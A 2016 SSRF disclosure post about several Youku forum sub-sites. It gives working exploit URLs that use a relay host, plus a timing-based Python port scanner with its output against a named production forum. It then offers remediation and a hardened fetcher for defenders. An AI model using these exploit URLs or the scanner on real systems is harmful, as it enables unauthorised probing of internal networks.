Multiple Youku sub-sites have SSRF vulnerabilities (a whole gift pack of them)
2016-07-12     Author: 黑帽网

As the title says.

For the concrete impact, see the earlier examples. The forum's downremoteimg AJAX action fetches whatever URL sits inside the [img] tag from the server side. In the URLs below the inner ampersands are encoded as %26 so that the s/ip/port/data parameters reach the relay script on phpinfo.me instead of being split off by the forum; the relay then steers the forum's fetcher (presumably by redirecting it) at the given internal host and port, here 127.0.0.1:6379 and 127.0.0.1:80.


http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]
http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]
http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]
http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]
http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]


Pick any one of the sites and scan its ports:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-11 09:28:01
#
# SSRF port scan through the forum's remote-image fetch. Each request makes
# the forum fetch ssrf.php, which bounces the fetch onto 127.0.0.1:<port>.
# A closed port is refused at once and the forum answers quickly; an open
# port keeps the forum's fetcher waiting, so our own request times out.
# A timeout is therefore treated as "port open".
import queue
import threading
import time

import requests

threads_count = 1            # single-threaded so the timing stays meaningful
que = queue.Queue()
lock = threading.Lock()
threads = []

ports = [21, 22, 23, 25, 69, 80, 81, 82, 83, 84, 110, 389, 443, 445, 488, 512,
         513, 514, 873, 901, 1043, 1080, 1099, 1090, 1158, 1352, 1433, 1434,
         1521, 2049, 2100, 2181, 2601, 2604, 3128, 3306, 3307, 3389, 4440, 4444,
         4445, 4848, 5000, 5280, 5432, 5500, 5632, 5900, 5901, 5902, 5903, 5984,
         6000, 6033, 6082, 6379, 6666, 7001, 7002, 7070, 7101, 7676, 7777, 7899,
         7988, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8069,
         8080, 8081, 8082, 8083, 8084, 8085, 8086, 8087, 8088, 8089, 8090, 8091,
         8092, 8093, 8094, 8095, 8098, 8099, 8980, 8990, 8443, 8686, 8787, 8880,
         8888, 9000, 9001, 9043, 9045, 9060, 9080, 9081, 9088, 9090, 9091, 9100,
         9200, 9300, 9443, 9871, 9999, 10000, 10068, 10086, 11211, 20000, 22022,
         22222, 27017, 28017, 50060, 50070]
for i in ports:
    que.put(str(i))

URL = ("http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg"
       "&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1"
       "%26port={port}%26data=helo.jpg[/img]")


def run():
    while que.qsize() > 0:
        p = que.get()
        time.sleep(0.3)      # pace the requests a little
        try:
            requests.get(URL.format(port=p), timeout=1.8)
        except requests.exceptions.Timeout:
            # the forum hung on the internal connection: port is open
            with lock:
                print("{port}  Open".format(port=p))
        except requests.exceptions.RequestException as err:
            # anything else (DNS failure, reset, ...) is not a verdict on the port
            with lock:
                print("{port}  error: {err}".format(port=p, err=err))


for i in range(threads_count):
    t = threading.Thread(target=run)
    t.daemon = True
    threads.append(t)
    t.start()
for t in threads:
    t.join()
80  Open
9000  Open
11211  Open
22022  Open


Remediation:

Forbid access to internal-network resources, and deploy the API that fetches external resources in a data center that is not your own.
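The remediation above is the fix; as an added example (not the forum's or Youku's code) here is what a server-side image fetcher that follows it looks like in Python. It assumes the relay in the exploit URLs works by redirecting the forum's HTTP client onto ftp://127.0.0.1:<port>/, which the s=ftp, ip and port parameters suggest but the post does not state. It goes beyond the page's specific case: it rejects non-http(s) schemes and unusual ports, rejects any hostname for which any DNS answer (IPv4 or IPv6, including IPv4-mapped IPv6) is a loopback, RFC 1918, link-local or otherwise non-public address, and follows redirects by hand so that every hop is checked again. The names check_target, fetch_remote_image and the example hostnames are my own.

```python
#!/usr/bin/env python3
"""Hardened server-side image fetcher (added example, not the forum's code).

The abused endpoint takes a message containing [img]URL[/img] and fetches
the URL from the forum server. Two checks close the hole shown above:
every hostname is resolved and refused if any answer is a non-public
address, and redirects are followed manually so that a public relay
(assumed here to be how exp.php / ssrf.php work) cannot bounce the
fetcher onto ftp://127.0.0.1:6379/ or http://127.0.0.1:80/.
"""
import ipaddress
import re
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
MAX_REDIRECTS = 3
REDIRECT_CODES = {301, 302, 303, 307, 308}


class UnsafeTarget(Exception):
    """Raised for any URL the fetcher refuses to contact."""


def extract_img_urls(message):
    """Pull the URLs out of [img]...[/img] tags in a forum message."""
    return [u.strip() for u in IMG_TAG.findall(message)]


def resolve_all(host):
    """Every address the host resolves to (A and AAAA), as strings."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def check_target(url, resolver=resolve_all):
    """Raise UnsafeTarget unless url is http(s), on 80/443, to a host whose
    every DNS answer is a public address. Returns the checked addresses."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeTarget("scheme not allowed: %r" % parts.scheme)
    if not parts.hostname or parts.username or parts.password:
        raise UnsafeTarget("missing host or embedded credentials")
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        raise UnsafeTarget("malformed port")
    if port not in ALLOWED_PORTS:
        raise UnsafeTarget("port not allowed: %d" % port)
    try:
        addrs = resolver(parts.hostname)
    except socket.gaierror as exc:
        raise UnsafeTarget("cannot resolve %s: %s" % (parts.hostname, exc))
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is still 127.0.0.1
        # is_global is False for loopback, RFC 1918, link-local (including the
        # 169.254.169.254 metadata address), CGNAT, ULA and reserved ranges.
        if not ip.is_global:
            raise UnsafeTarget("%s resolves to non-public %s" % (parts.hostname, addr))
    return addrs


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib hand 3xx responses back instead of following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def urllib_opener(url):
    """One request, no automatic redirects. Returns (status, headers, body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=5) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:      # 3xx and 4xx/5xx land here
        return err.code, dict(err.headers), b""


def fetch_remote_image(url, opener=urllib_opener, resolver=resolve_all,
                       max_redirects=MAX_REDIRECTS):
    """Fetch url, re-running check_target on every redirect hop.
    Returns (body, list_of_hops)."""
    hops = [url]
    for _ in range(max_redirects + 1):
        check_target(url, resolver)
        status, headers, body = opener(url)
        if status in REDIRECT_CODES:
            location = {k.lower(): v for k, v in headers.items()}.get("location")
            if not location:
                raise UnsafeTarget("redirect without Location")
            url = urljoin(url, location)     # relative Location resolved, then re-checked
            hops.append(url)
            continue
        if status != 200:
            raise UnsafeTarget("unexpected status %d" % status)
        return body, hops
    raise UnsafeTarget("too many redirects (%d)" % max_redirects)
```

Two caveats belong with this. The caller should connect to one of the addresses check_target returns and send the original Host header, instead of letting the HTTP library resolve the name a second time; otherwise a DNS answer that changes between the check and the connect (rebinding) gets past it. And the endpoint should not leak the result of the fetch back to the poster, including its timing: the scan above needs nothing more than whether the request took longer than 1.8 seconds.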
